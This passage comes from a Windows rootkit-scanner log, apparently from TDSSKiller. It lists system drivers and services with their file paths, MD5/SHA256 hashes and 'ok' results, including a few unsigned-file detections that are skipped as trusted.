21:54:14.0117 0x1f20 [ E306A24D9694C724FA2491278BF50FDB, 1D246B9C28550640EACBF8CF9DC980FD75106B92832D392FEBEF0C7012353091 ] fvevol          C:\Windows\system32\DRIVERS\fvevol.sys
21:54:14.0148 0x1f20 fvevol - ok
21:54:14.0179 0x1f20 [ 65EE0C7A58B65E74AE05637418153938, 0E1A398ADD8411AF4CCC3344D67BE1B261320C58328BD5C5855A357476FAEBEF ] gagp30kx        C:\Windows\system32\DRIVERS\gagp30kx.sys
21:54:14.0195 0x1f20 gagp30kx - ok
21:54:14.0257 0x1f20 [ C44D560E441F091EA3B72F778EC60DE2, 1F90BA0E98C436B98BF6B0BC93146B52C081DF374424E2DCA270316D508A59B2 ] GameConsoleService C:\Program Files\HP Games\HP Game Console\GameConsoleService.exe
21:54:14.0273 0x1f20 GameConsoleService - ok
21:54:14.0366 0x1f20 [ E897EAF5ED6BA41E081060C9B447A673, A428DC68516F19C6C53A8B62E4BDB2587E70FB751B9D77700B6B147D347DA157 ] gpsvc           C:\Windows\System32\gpsvc.dll
21:54:14.0444 0x1f20 gpsvc - ok
21:54:14.0460 0x1f20 [ C44E3C2BAB6837DB337DDEE7544736DB, 88A24FF7D2FECCEAFFD421B2039A0FB623DA47A6B220B80EF1E52DD26D9E222D ] hcw85cir        C:\Windows\system32\drivers\hcw85cir.sys
21:54:14.0522 0x1f20 hcw85cir - ok
21:54:14.0553 0x1f20 [ A5EF29D5315111C80A5C1ABAD14C8972, A181DA72E946F121C3F4A19438C547B0BFD15138AB1DB5465945EC89DF1F6B0A ] HdAudAddService C:\Windows\system32\drivers\HdAudio.sys
21:54:14.0600 0x1f20 HdAudAddService - ok
21:54:14.0631 0x1f20 [ 9036377B8A6C15DC2EEC53E489D159B5, 1E56D2ACFE92E6DF96D755B05C63D580EED82C210F075C8623E138BEE6BCD41B ] HDAudBus        C:\Windows\system32\drivers\HDAudBus.sys
21:54:14.0663 0x1f20 HDAudBus - ok
21:54:14.0694 0x1f20 [ 1D58A7F3E11A9731D0EAAAA8405ACC36, 7056FA18B86FBD52C4A6092D80476C02553EA053D6A0BEDB01A2FA5E152D5215 ] HidBatt         C:\Windows\system32\DRIVERS\HidBatt.sys
21:54:14.0725 0x1f20 HidBatt - ok
21:54:14.0756 0x1f20 [ 89448F40E6DF260C206A193A4683BA78, 71E0FCC32AE6FF8DFF420DB0383D6A200E1EAE14BD2E32453F92CE18B31C1F3C ] HidBth          C:\Windows\system32\DRIVERS\hidbth.sys
21:54:14.0772 0x1f20 HidBth - ok
21:54:14.0803 0x1f20 [ CF50B4CF4A4F229B9F3C08351F99CA5E, B97843620AF80FF0EC8F2C438255C0A42A756C6314FAF3DEF415DE16E14C108F ] HidIr           C:\Windows\system32\DRIVERS\hidir.sys
21:54:14.0834 0x1f20 HidIr - ok
21:54:14.0881 0x1f20 [ 2BC6F6A1992B3A77F5F41432CA6B3B6B, 2AF3312F1C8C8923C0A29AA5DAE57CE269417E53DEA2F0CCCC8DB57029698FE1 ] hidserv         C:\Windows\system32\hidserv.dll
21:54:14.0912 0x1f20 hidserv - ok
21:54:14.0959 0x1f20 [ 10C19F8290891AF023EAEC0832E1EB4D, E208553029488A6EE2F5216CC9FE5F93E9931A94C0D0625253BB159E30642853 ] HidUsb          C:\Windows\system32\DRIVERS\hidusb.sys
21:54:14.0990 0x1f20 HidUsb - ok
21:54:15.0021 0x1f20 [ 196B4E3F4CCCC24AF836CE58FACBB699, 7A2E1F603A073421FA0987EFB96647F1F0F2D4E0C82AA62EBC041585DA811DAF ] hkmsvc          C:\Windows\system32\kmsvc.dll
21:54:15.0084 0x1f20 hkmsvc - ok
21:54:15.0177 0x1f20 [ 6658F4404DE03D75FE3BA09F7ABA6A30, E51D9C1580A283EB862F09B73AAE1B647DD683A53F3DD99834222F12DD15E40F ] HomeGroupListener C:\Windows\system32\ListSvc.dll
21:54:15.0224 0x1f20 HomeGroupListener - ok
21:54:15.0287 0x1f20 [ DBC02D918FFF1CAD628ACBE0C0EAA8E8, 02121800D9062692C102475876AE8143EBE46D855E8328B8CDCFE6A2F0D19696 ] HomeGroupProvider C:\Windows\system32\provsvc.dll
21:54:15.0349 0x1f20 HomeGroupProvider - ok
21:54:15.0427 0x1f20 [ 0141816A095A3F5A83FFA5B4A47B8023, F7B26D707EB817FA0F5BFDFA785370B458AF54C94A1E679B36F6808158EA467C ] HP Health Check Service C:\Program Files\Hewlett-Packard\HP Health Check\hphc_service.exe
21:54:15.0427 0x1f20 HP Health Check Service - detected UnsignedFile.Multi.Generic ( 1 )
21:54:18.0391 0x1f20 Detect skipped due to KSN trusted
21:54:18.0391 0x1f20 HP Health Check Service - ok
21:54:18.0422 0x1f20 [ 1210960FF8928950D2A786895B0C424A, 22C8785E024CFDD3A43FAEAAA96B8332C37E9B6C765AB7AFBCD3DAA2DC9EFFC7 ] HpqKbFiltr      C:\Windows\system32\DRIVERS\HpqKbFiltr.sys
21:54:18.0469 0x1f20 HpqKbFiltr - ok
21:54:18.0516 0x1f20 [ FDF273A845F1FFCCEADF363AAF47582F, 9BB99346A977225EF77261CD3CF4219A238EB06FFE2DB91D00A0037BDCFECEF1 ] hpqwmiex        C:\Program Files\Hewlett-Packard\Shared\hpqwmiex.exe
21:54:18.0531 0x1f20 hpqwmiex - ok
21:54:18.0578 0x1f20 [ 295FDC419039090EB8B49FFDBB374549, 670E8015FD374640C6570F56F7FE8DE4D8F92E7A8072F5D1B2B95D0BD699CEF7 ] HpSAMD          C:\Windows\system32\drivers\HpSAMD.sys
21:54:18.0609 0x1f20 HpSAMD - ok
21:54:18.0687 0x1f20 [ 871917B07A141BFF43D76D8844D48106, 30C702008D0EE57D63F74864967DD19A55A268E77E42B5B3CC73037AD51D2987 ] HTTP            C:\Windows\system32\drivers\HTTP.sys
21:54:18.0765 0x1f20 HTTP - ok
21:54:18.0875 0x1f20 [ F44461E66F1B7DD267957FE9BAA63ED0, 5B51692F1670A43A8C1B9E2EECB4042AB04BA92AAA347405A61D3EA8C478BC5A ] huawei_enumerator C:\Windows\system32\DRIVERS\ew_jubusenum.sys
21:54:19.0031 0x1f20 huawei_enumerator - ok
21:54:19.0171 0x1f20 [ F547F862B8907F1BCBD9B72A72A6449E, 18045A85AF0060E599A386D2F50E333D0ADEBECD2987CB4EE6377D1537197285 ] hwdatacard      C:\Windows\system32\DRIVERS\ewusbmdm.sys
21:54:19.0265 0x1f20 hwdatacard - ok
21:54:19.0421 0x1f20 HWDeviceService.exe - ok
21:54:19.0499 0x1f20 [ 0C4E035C7F105F1299258C90886C64C5, CFB4FBE7B28058E6D3E6E508CF3C1645F6AAE0AFEB4C5364835B9C42311DF0D4 ] hwpolicy        C:\Windows\system32\drivers\hwpolicy.sys
21:54:19.0530 0x1f20 hwpolicy - ok
21:54:19.0639 0x1f20 [ F151F0BDC47F4A28B1B20A0818EA36D6, 84B24B5796D9F70A8C37773F5484A4606CC7908370CCD942627ACBEDC4952D79 ] i8042prt        C:\Windows\system32\drivers\i8042prt.sys
21:54:19.0670 0x1f20 i8042prt - ok
21:54:19.0717 0x1f20 [ 5CD5F9A5444E6CDCB0AC89BD62D8B76E, 72870092A80C6DAE0105025B0ED8B607E98BA81E59298364A7FE4C9C56C68FF0 ] iaStorV         C:\Windows\system32\drivers\iaStorV.sys
21:54:19.0748 0x1f20 iaStorV - ok
21:54:19.0904 0x1f20 [ 3E9213A2A050BF429E91898C90F8B4E3, D80ABE5691087661B19F01927B631CB8C5291120B814B6F863F046E0D643E9E4 ] idsvc           C:\Windows\Microsoft.NET\Framework\v3.0\Windows Communication Foundation\infocard.exe
21:54:19.0998 0x1f20 idsvc - ok
21:54:20.0013 0x1f20 IEEtwCollectorService - ok
21:54:20.0045 0x1f20 [ 4173FF5708F3236CF25195FECD742915, 0A9C0701DF6EAC6602BE342FC13C7950EF04BB5BDF7D96C2C5DABBD2A29AA55D ] iirsp           C:\Windows\system32\DRIVERS\iirsp.sys
21:54:20.0076 0x1f20 iirsp - ok
21:54:20.0201 0x1f20 [ B9C54120F46392100478F58F374E5709, A28EE8B0988F580D5984E815FC78DF41B169260814234AA0E453375542D0957B ] IKEEXT          C:\Windows\System32\ikeext.dll
21:54:20.0294 0x1f20 IKEEXT - ok
21:54:20.0341 0x1f20 [ A0F12F2C9BA6C72F3987CE780E77C130, 5F53DF8BE1621AA7DFB655CFD9C95E0AFA1AD3CE2E290E19D7B7FB3C6E380034 ] intelide        C:\Windows\system32\drivers\intelide.sys
21:54:20.0357 0x1f20 intelide - ok
21:54:20.0388 0x1f20 [ 3B514D27BFC4ACCB4037BC6685F766E0, F12D7AC62F8550E6F33B28AD751D8413AB7FFEF963242D99FFA76CE8A48B027A ] intelppm        C:\Windows\system32\DRIVERS\intelppm.sys
21:54:20.0419 0x1f20 intelppm - ok
21:54:20.0481 0x1f20 [ ACB364B9075A45C0736E5C47BE5CAE19, 202F77C659103D2D0E787B8CB0A23BE32EA5AA2E6B3B0A0F0A8DFA906AB3C0C0 ] IPBusEnum       C:\Windows\system32\ipbusenum.dll
21:54:20.0559 0x1f20 IPBusEnum - ok
21:54:20.0575 0x1f20 [ 709D1761D3B19A932FF0238EA6D50200, 0A9D2C3A6E91CA45540555B40CB4E2DF3EBE98C1D164C4EECEE20C86782F5823 ] IpFilterDriver C:\Windows\system32\DRIVERS\ipfltdrv.sys
21:54:20.0622 0x1f20 IpFilterDriver - ok
21:54:20.0700 0x1f20 [ 58F67245D041FBE7AF88F4EAF79DF0FA, 67468D6A46FF4D87AD321BFEA42F2FC843D09AA292A119C76D4D795D06028F96 ] iphlpsvc        C:\Windows\System32\iphlpsvc.dll
21:54:20.0778 0x1f20 iphlpsvc - ok
21:54:20.0825 0x1f20 [ 4BD7134618C1D2A27466A099062547BF, 20284ABEF4433A59E2981F4143CAEC67DC990864FE0B9E3DC70EE0B88539E964 ] IPMIDRV         C:\Windows\system32\drivers\IPMIDrv.sys
21:54:20.0871 0x1f20 IPMIDRV - ok
21:54:20.0887 0x1f20 [ A5FA468D67ABCDAA36264E463A7BB0CD, EDB828D596E43372F97DAE1AADA46428C4C45FB80646DDC64FAD5F25C826CF63 ] IPNAT           C:\Windows\system32\drivers\ipnat.sys
21:54:20.0965 0x1f20 IPNAT - ok
21:54:20.0996 0x1f20 [ 42996CFF20A3084A56017B7902307E9F, 688176DAB91BE569280E4822E4C5BDE755794D293591C53F8047AD59C441751D ] IRENUM          C:\Windows\system32\drivers\irenum.sys
21:54:21.0027 0x1f20 IRENUM - ok
21:54:21.0027 0x1f20 [ 1F32BB6B38F62F7DF1A7AB7292638A35, 86522358680FBB1CEBC56B4D139290689BB0F71A3EC78CE883E4D75D0B37586F ] isapnp          C:\Windows\system32\drivers\isapnp.sys
21:54:21.0043 0x1f20 isapnp - ok
21:54:21.0090 0x1f20 [ EB34CE31FABD4DC4343FD2AD16D2CAF9, D21C91227A15DA89ECF522345D0AB80B3B7FC24A230596DABDB8BD3B7554CE8C ] iScsiPrt        C:\Windows\system32\drivers\msiscsi.sys
21:54:21.0137 0x1f20 iScsiPrt - ok
21:54:21.0183 0x1f20 [ 65DA9FA42C0972FE5B9B7D6047F06F4C, 602A0A2EA95726FE6988867EB624D911D67D1FA9415AFC96559DE5E031A48FC5 ] JMCR            C:\Windows\system32\DRIVERS\jmcr.sys
21:54:21.0230 0x1f20 JMCR - detected UnsignedFile.Multi.Generic ( 1 )
21:54:24.0132 0x1f20 Detect skipped due to KSN trusted
21:54:24.0132 0x1f20 JMCR - ok
21:54:24.0194 0x1f20 [ ADEF52CA1AEAE82B50DF86B56413107E, A3AE1E96B04AC81665ABBD3CB267DFB3F78376DAE18FB0DBD447908DDAAA22D2 ] kbdclass        C:\Windows\system32\drivers\kbdclass.sys
21:54:24.0210 0x1f20 kbdclass - ok
21:54:24.0257 0x1f20 [ 9E3CED91863E6EE98C24794D05E27A71, 90CF59F20E14E4A5A793266805E82BF7AE1F0CF4C7BAB1FD2EEF3B53C5DF770F ] kbdhid          C:\Windows\system32\drivers\kbdhid.sys
21:54:24.0272 0x1f20 kbdhid - ok
21:54:24.0288 0x1f20 [ BF08DE8E4FA1F143D41B3241F7FCE5F6, 4140BE0ECE0D4B8FDD413DBA120F5D7EF6F94628224320EDA2A85E50BEFDA638 ] KeyIso          C:\Windows\system32\lsass.exe
21:54:24.0303 0x1f20 KeyIso - ok
21:54:24.0335 0x1f20 [ EF88BAC2B489D9C46F4E41ACF0219CD0, BF0FAF51BB6D0E588E53E483EF48D8D96B33544113892CC723CDEFAE7E5FB97A ] KSecDD          C:\Windows\system32\Drivers\ksecdd.sys
21:54:24.0366 0x1f20 KSecDD - ok
21:54:24.0397 0x1f20 [ 49D70660EE8266988C1F99A0297A1430, D17B7A3118DB42358DEA80D8A21C5F1B0CC33BF74F6570676D4708B36BB91FD4 ] KSecPkg         C:\Windows\system32\Drivers\ksecpkg.sys
21:54:24.0413 0x1f20 KSecPkg - ok
21:54:24.0459 0x1f20 [ 89A7B9CC98D0D80C6F31B91C0A310FCD, 4583CAEEE0D50C0C7CE955E533FDA063CDC37B69033D41EF22EF1BA242E4C747 ] KtmRm           C:\Windows\system32\msdtckrm.dll
21:54:24.0491 0x1f20 KtmRm - ok
21:54:24.0553 0x1f20 [ D64AF876D53ECA3668BB97B51B4E70AB, D5C07C019BFEAFBEDC29AB5060356A3B07449712B21B50E03378BEF04AF180F9 ] LanmanServer    C:\Windows\system32\srvsvc.dll
21:54:24.0584 0x1f20 LanmanServer - ok
21:54:24.0600 0x1f20 [ 58405E4F68BA8E4057C6E914F326ABA2, C3E6519A1A38F1B3597D4391E42ABFE8F1F5E86256C4B3BD876CDAD9BB68B0A6 ] LanmanWorkstation C:\Windows\System32\wkssvc.dll
21:54:24.0647 0x1f20 LanmanWorkstation - ok
21:54:24.0740 0x1f20 [ F533084C0538CF414FD36FDCAE727164, C158AA095D8CF922A2D293BB89DAC8CE4823603660985CD04B8CE4761C6BC25A ] Lavasoft Ad-Aware Service C:\Program Files\Lavasoft\Ad-Aware\AAWService.exe
21:54:24.0803 0x1f20 Lavasoft Ad-Aware Service - ok
21:54:24.0865 0x1f20 [ 83D8BE94E1CBCBE2EA8372DB1A95A159, 28D18C7B93EFB6C83023D39A54489DDE98DE578AFCC06DD0712D00DE7CD48968 ] LightScribeService C:\Program Files\Common Files\LightScribe\LSSrvc.exe
21:54:24.0881 0x1f20 LightScribeService - detected UnsignedFile.Multi.Generic ( 1 )
21:54:27.0704 0x1f20 Detect skipped due to KSN trusted
21:54:27.0704 0x1f20 LightScribeService - ok
21:54:27.0876 0x1f20 [ F3FE36DDE7F59B7D4F9581C920670198, 7BBAC481A52FDC1CEAF9B94E710310E6A1D67551A002DC6825A36F79B75E74AC ] LiveUpdate      C:\PROGRA~1\Symantec\LIVEUP~1\LUCOMS~1.EXE
21:54:27.0969 0x1f20 LiveUpdate - ok
21:54:28.0032 0x1f20 [ F7611EC07349979DA9B0AE1F18CCC7A6, 879AA7A391966F00761CA039C25EBC62F6712DD5461694911EEC673E12DE103E ] lltdio          C:\Windows\system32\DRIVERS\lltdio.sys
21:54:28.0079 0x1f20 lltdio - ok
21:54:28.0110 0x1f20 [ 5700673E13A2117FA3B9020C852C01E2, 6684A2905EE8C438F2A64BE47E51A54D287B08DEFB8E0AE7FC2809D845EE3C5F ] lltdsvc         C:\Windows\System32\lltdsvc.dll
21:54:28.0172 0x1f20 lltdsvc - ok
21:54:28.0188 0x1f20 [ 55CA01BA19D0006C8F2639B6C045E08B, 4DBBDC820C514DB18CC13F8EE178F8C4E39C295C6E3C255416C235553CE7BDC1 ] lmhosts         C:\Windows\System32\lmhsvc.dll
21:54:28.0219 0x1f20 lmhosts - ok
21:54:28.0250 0x1f20 [ EB119A53CCF2ACC000AC71B065B78FEF, 1FD60735C4945AE565C223F0B47EAF9602D8777E3D15600914C1A9D761215AF9 ] LSI_FC          C:\Windows\system32\DRIVERS\lsi_fc.sys
21:54:28.0281 0x1f20 LSI_FC - ok
21:54:28.0281 0x1f20 [ 8ADE1C877256A22E49B75D1CC9161F9C, 3D64F233DC866537E50549A7C1A2B40A954055B22F0BDA39825B04C38C607CB7 ] LSI_SAS         C:\Windows\system32\DRIVERS\lsi_sas.sys
21:54:28.0297 0x1f20 LSI_SAS - ok
21:54:28.0313 0x1f20 [ DC9DC3D3DAA0E276FD2EC262E38B11E9, A264990857CBC74036799E17A087130626C0A09BE19879019BAF2D761C62AECC ] LSI_SAS2        C:\Windows\system32\DRIVERS\lsi_sas2.sys
21:54:28.0328 0x1f20 LSI_SAS2 - ok
21:54:28.0344 0x1f20 [ 0A036C7D7CAB643A7F07135AC47E0524, 2F662D07FCB74B8D493156DB555EAA90A47E93CF14C7B30039D2FE47EB8682B8 ] LSI_SCSI        C:\Windows\system32\DRIVERS\lsi_scsi.sys
21:54:28.0359 0x1f20 LSI_SCSI - ok
21:54:28.0375 0x1f20 [ 6703E366CC18D3B6E534F5CF7DF39CEE, 7396B9AF938284D99EC51206A7B2FA4A0DC10A493DCE6707818B03A7473782C4 ] luafv           C:\Windows\system32\drivers\luafv.sys
21:54:28.0422 0x1f20 luafv - ok
21:54:28.0453 0x1f20 [ 79EC6C0033776F89DD5131241F0170E1, EA958F114DAC06D184735FF8308F0DAA953CA7C0077AF1BBEDC440AAEC2D07A6 ] massfilter      C:\Windows\system32\DRIVERS\massfilter.sys
21:54:28.0500 0x1f20 massfilter - ok
21:54:28.0547 0x1f20 [ A3F4391DFDF2F9E9FE4EAD193265A5AD, A60A1A345622F4758181FB0B6EE784B0B718105FEE7B0F6FEDE5AD59FE448EE1 ] MBAMProtector   C:\Windows\system32\drivers\mbam.sys
21:54:28.0578 0x1f20 MBAMProtector - ok
21:54:28.0734 0x1f20 [ 0BB29DE40C9D9529793DCDB59A43CF5B, 251001A407D32EF22F64915EEFFAAEC229073C4549BF7D9D1D4209B7D15B4681 ] MBAMScheduler   C:\Program Files\Malwarebytes Anti-Malware\mbamscheduler.exe
21:54:28.0796 0x1f20 MBAMScheduler - ok
21:54:28.0859 0x1f20 [ 5F82D8188B370B0CF185D4AE2B9B4A0E, 549B53DD989A069E1C38347C4CEF5283DF9B428CE102799B06A20D3D8F23825F ] MBAMService     C:\Program Files\Malwarebytes Anti-Malware\mbamservice.exe
21:54:28.0890 0x1f20 MBAMService - ok
21:54:28.0937 0x1f20 [ 8E2E9CCD873ABF180F48BCAEEEBE347D, 35DBBB8E63B480151EA5701D9DB7C90642FA2391D044DB400D3644F3E21BB0C1 ] MBAMSwissArmy   C:\Windows\system32\drivers\6BE235D8.sys
21:54:28.0968 0x1f20 MBAMSwissArmy - ok
21:54:28.0999 0x1f20 [ 312CD3307F600E7CD340B79B3DCB3A01, 861A6DFC53C69743129DAAFE73DECDE8D842475503E8D713E7CE5D22AC8D1370 ] MBAMWebAccessControl C:\Windows\system32\drivers\mwac.sys
21:54:29.0015 0x1f20 MBAMWebAccessControl - ok
21:54:29.0030 0x1f20 [ 0FFF5B045293002AB38EB1FD1FC2FB74, 49071B565FD5B2DE43EC00D8518C3BE70843F38919E82F13104B8C1FAFB20374 ] megasas         C:\Windows\system32\DRIVERS\megasas.sys
21:54:29.0061 0x1f20 megasas - ok
21:54:29.0108 0x1f20 [ DCBAB2920C75F390CAF1D29F675D03D6, 85C3A7A010BEA5E3C6179161B295F2CB900A6A214833A5F87A4327392880E2BB ] MegaSR          C:\Windows\system32\DRIVERS\MegaSR.sys
21:54:29.0139 0x1f20 MegaSR - ok
21:54:29.0171 0x1f20 [ 146B6F43A673379A3C670E86D89BE5EA, C4412DCF80DE6B55466F399413271364F14BC0819C224AA161EDDC31A9775440 ] MMCSS           C:\Windows\system32\mmcss.dll
21:54:29.0202 0x1f20 MMCSS - ok
21:54:29.0217 0x1f20 [ F001861E5700EE84E2D4E52C712F4964, F4DC5AEED6F34D76CCEF360862CC47EF71097BE0813C8CE04EE5F0DB387DFFAE ] Modem           C:\Windows\system32\drivers\modem.sys
21:54:29.0249 0x1f20 Modem - ok
21:54:29.0280 0x1f20 [ 79D10964DE86B292320E9DFE02282A23, 52714827B7EEDACA55326A4E4F6158D4942DFAA3BACDE303A2F569BF3F4FAA72 ] monitor         C:\Windows\system32\DRIVERS\monitor.sys
21:54:29.0295 0x1f20 monitor - ok
21:54:29.0327 0x1f20 [ FB18CC1D4C2E716B6B903B0AC0CC0609, F10CCA63493782B16DE6B96B94A27078DBE68AECEF34FDF840CFF86D2C6E3C5E ] mouclass        C:\Windows\system32\drivers\mouclass.sys
21:54:29.0342 0x1f20 mouclass - ok
21:54:29.0358 0x1f20 [ 2C388D2CD01C9042596CF3C8F3C7B24D, B2FB72272BB01AEDA4047B57C943B7E9BD8A6497854F8CC34672AAA592D0A703 ] mouhid          C:\Windows\system32\DRIVERS\mouhid.sys
21:54:29.0373 0x1f20 mouhid - ok
21:54:29.0420 0x1f20 [ FC8771F45ECCCFD89684E38842539B9B, 806DDF2B4830CA866582FE74A521BB7DF26CA0E19013DAF584D3677FB48CC77A ] mountmgr        C:\Windows\system32\drivers\mountmgr.sys
21:54:29.0436 0x1f20 mountmgr - ok
21:54:29.0498 0x1f20 [ 2F7591FB26EEA04245CCF3A0F8E38A28, 49B4A64ACB3641BD42BCCCF0E10E33EDB8016D5770B82A06CE9B951892E7BFBD ] MozillaMaintenance C:\Program Files\Mozilla Maintenance Service\maintenanceservice.exe
21:54:29.0529 0x1f20 MozillaMaintenance - ok
21:54:29.0561 0x1f20 [ 2D699FB6E89CE0D8DA14ECC03B3EDFE0, D3D903EEA465D77345AAC9B9F02CDEADF4831212EA2DE4FCA33BEE26EBB47420 ] mpio            C:\Windows\system32\drivers\mpio.sys
21:54:29.0592 0x1f20 mpio - ok
21:54:29.0639 0x1f20 [ AD2723A7B53DD1AACAE6AD8C0BFBF4D0, 1D6DCFA0E56C3E55B6AED819176E751502F863BA0FCF4F0B3253A81D208141A2 ] mpsdrv          C:\Windows\system32\drivers\mpsdrv.sys
21:54:29.0670 0x1f20 mpsdrv - ok
21:54:29.0732 0x1f20 [ 9835584E999D25004E1EE8E5F3E3B881, 71798B0CBE9AE69F1F29B845319019C69EC7F415CBABB3B87DDE92C360675021 ] MpsSvc          C:\Windows\system32\mpssvc.dll
21:54:29.0795 0x1f20 MpsSvc - ok
21:54:29.0826 0x1f20 [ 03F899F521D2AAED1C55008F734DF252, 4E56A51476A13F5630719018037B1F63DF9ACEA1CFE782AF04E669BD696954C5 ] MRxDAV          C:\Windows\system32\drivers\mrxdav.sys
21:54:29.0888 0x1f20 MRxDAV - ok
21:54:29.0935 0x1f20 [ 5D16C921E3671636C0EBA3BBAAC5FD25, 5BC107B95CAFC88F51FBB9F657B99944B20627A2B618F263093D7045E4FFD65C ] mrxsmb          C:\Windows\system32\DRIVERS\mrxsmb.sys
21:54:29.0982 0x1f20 mrxsmb - ok
21:54:29.0997 0x1f20 [ 6D17A4791ACA19328C685D256349FEFC, 012AA3D84EEAAF53780D06D2D11B9727DFC3441F3FAD75BC9E751FB814403668 ] mrxsmb10        C:\Windows\system32\DRIVERS\mrxsmb10.sys
21:54:30.0060 0x1f20 mrxsmb10 - ok
21:54:30.0091 0x1f20 [ B81F204D146000BE76651A50670A5E9E, 78193D0F967BE9829E53F9B500342934B4B1E1F4CEFC444382959E2061BC3B17 ] mrxsmb20        C:\Windows\system32\DRIVERS\mrxsmb20.sys
21:54:30.0122 0x1f20 mrxsmb20 - ok
21:54:30.0169 0x1f20 [ 012C5F4E9349E711E11E0F19A8589F0A, 208B92DFCF7AD43202660FBBC9FF5E03AEDBEE38178FF3628EB74CB6CD37C584 ] msahci          C:\Windows\system32\drivers\msahci.sys
21:54:30.0200 0x1f20 msahci - ok
21:54:30.0216 0x1f20 [ 55055F8AD8BE27A64C831322A780A228, C2C9FD1F61302997117B1CD0835E8234405BB80084065ED05363B77868397304 ] msdsm           C:\Windows\system32\drivers\msdsm.sys
21:54:30.0247 0x1f20 msdsm - ok
21:54:30.0278 0x1f20 [ E1BCE74A3BD9902B72599C0192A07E27, 5162EB623FE64E9DFEAC6CA2410EFA1314E62EC13207FFBFED2D61AA887603C4 ] MSDTC           C:\Windows\System32\msdtc.exe
21:54:30.0309 0x1f20 MSDTC - ok
21:54:30.0341 0x1f20 [ DAEFB28E3AF5A76ABCC2C3078C07327F, 6EB558532400B489763BAE7203538DE5F196282A8CB46A1B31D59120FC5AFCEF ] Msfs            C:\Windows\system32\drivers\Msfs.sys
21:54:30.0372 0x1f20 Msfs - ok
21:54:30.0387 0x1f20 [ 3E1E5767043C5AF9367F0056295E9F84, B2EDFECD3C14E4FE1BA87D9A86334043A9BD696A554EBD186DA7EAEB2EBD4F70 ] mshidkmdf       C:\Windows\System32\drivers\mshidkmdf.sys
21:54:30.0419 0x1f20 mshidkmdf - ok
21:54:30.0450 0x1f20 [ 0A4E5757AE09FA9622E3158CC1AEF114, ED574E420E57374E328C7C526504ECA569C164287966F06019EC207CB17F2C54 ] msisadrv        C:\Windows\system32\drivers\msisadrv.sys
21:54:30.0465 0x1f20 msisadrv - ok
21:54:30.0497 0x1f20 [ 90F7D9E6B6F27E1A707D4A297F077828, BEFC220EAA7307849600748842ACB9254A6A91158812D9B23EFAF912C498BA7F ] MSiSCSI         C:\Windows\system32\iscsiexe.dll
21:54:30.0528 0x1f20 MSiSCSI - ok
21:54:30.0528 0x1f20 msiserver - ok
21:54:30.0559 0x1f20 [ 8C0860D6366AAFFB6C5BB9DF9448E631, 949C5A14E57F2D7385543C17C3485E7ADE36EA2016F6E0A1866571D2EDE90A77 ] MSKSSRV         C:\Windows\system32\drivers\MSKSSRV.sys
21:54:30.0606 0x1f20 MSKSSRV - ok
21:54:30.0621 0x1f20 [ 3EA8B949F963562CEDBB549EAC0C11CE, 1B0B2F16A1790282504F3C548D47C3281EFB440D5D9711A1EF76D6371B768D2D ] MSPCLOCK        C:\Windows\system32\drivers\MSPCLOCK.sys
21:54:30.0653 0x1f20 MSPCLOCK - ok
21:54:30.0668 0x1f20 [ F456E973590D663B1073E9C463B40932, 48BA6D5580EE7B6A4C06E04772FD35B51779553FC0DD6C5C30DD8B5DEEB25B11 ] MSPQM           C:\Windows\system32\drivers\MSPQM.sys
21:54:30.0699 0x1f20 MSPQM - ok
21:54:30.0715 0x1f20 [ 0E008FC4819D238C51D7C93E7B41E560, 141FCEBDD05874407EAEC35A9DCD3BB16F2A428F23E55487D6A5DBFCADBF10D2 ] MsRPC           C:\Windows\system32\drivers\MsRPC.sys
21:54:30.0731 0x1f20 MsRPC - ok
21:54:30.0746 0x1f20 [ FC6B9FF600CC585EA38B12589BD4E246, F05DB01AE1955D2468CE6B51E51998B111CA3B0BDEED090EE6B99B625CBA564A ] mssmbios        C:\Windows\system32\drivers\mssmbios.sys
21:54:30.0762 0x1f20 mssmbios - ok
21:54:30.0777 0x1f20 [ B42C6B921F61A6E55159B8BE6CD54A36, 6BB0A7BE005B8F281E551D1B8046CE4202372BC7AE0161881C858BFAC675FE1C ] MSTEE           C:\Windows\system32\drivers\MSTEE.sys
21:54:30.0809 0x1f20 MSTEE - ok
21:54:30.0824 0x1f20 [ 33599130F44E1F34631CEA241DE8AC84, E15B31D1AFDC8DC6D2B21D4215796A99ECC69EEDBB06CEED01AECC3C99A44C8B ] MTConfig        C:\Windows\system32\DRIVERS\MTConfig.sys
21:54:30.0855 0x1f20 MTConfig - ok
21:54:30.0871 0x1f20 [ 159FAD02F64E6381758C990F753BCC80, E55AB01DCFA95ECAB24A2A9656E28FF9D064BA08B3D82DC8AA42F5991BA09598 ] Mup             C:\Windows\system32\Drivers\mup.sys
21:54:30.0887 0x1f20 Mup - ok
21:54:30.0933 0x1f20 [ 61D57A5D7C6D9AFE10E77DAE6E1B445E, D252248532142E9E2332DA693BC51B795102CA938B568FF04981E98B19BFBC5C ] napagent        C:\Windows\system32\qagentRT.dll
21:54:30.0996 0x1f20 napagent - ok
21:54:31.0027 0x1f20 [ 26384429FCD85D83746F63E798AB1480, 957C115C263A4B4DC854558B43ECE632D8E2BCCB744E23A01EBA7476BA2E7FFB ] NativeWifiP     C:\Windows\system32\DRIVERS\nwifi.sys
21:54:31.0074 0x1f20 NativeWifiP - ok
21:54:31.0183 0x1f20 [ 339D6CD79DFCB48EF125A89949ED54B4, D3C6F56363F0FA9A45C3560816DD7533C7D15D7DCC78346A4A48C29EA86D9439 ] NAVENG          C:\PROGRA~2\Symantec\DEFINI~1\VIRUSD~1\20150105.019\NAVENG.SYS
21:54:31.0230 0x1f20 NAVENG - ok
21:54:31.0370 0x1f20 [ 2061D3961C053AA0C55A20F6184DA4CF, 4D50107E7245ED58B943BA536B6B69A6C7465202DCE78135BB0FD5EF2EF02FB3 ] NAVEX15         C:\PROGRA~2\Symantec\DEFINI~1\VIRUSD~1\20150105.019\NAVEX15.SYS
21:54:31.0448 0x1f20 NAVEX15 - ok
21:54:31.0542 0x1f20 [ 8C9C922D71F1CD4DEF73F186416B7896, 15FF43CD90C7913F83B35F2E7986561584588E8A45196EBD965C3A355836A9C7 ] NDIS            C:\Windows\system32\drivers\ndis.sys
21:54:31.0589 0x1f20 NDIS - ok
21:54:31.0635 0x1f20 [ 0E1787AA6C9191D3D319E8BAFE86F80C, F535022747355B2C66424BDA892D7DCB820C2EB8EE05BAE5BC6D1B1D65186278 ] NdisCap         C:\Windows\system32\DRIVERS\ndiscap.sys
21:54:31.0667 0x1f20 NdisCap - ok
21:54:31.0698 0x1f20 [ E4A8AEC125A2E43A9E32AFEEA7C9C888, 6EA181117126FC70B3C1DD1AC73CC26D1603A2CF49E47F66623E2C9489C49B55 ] NdisTapi        C:\Windows\system32\DRIVERS\ndistapi.sys
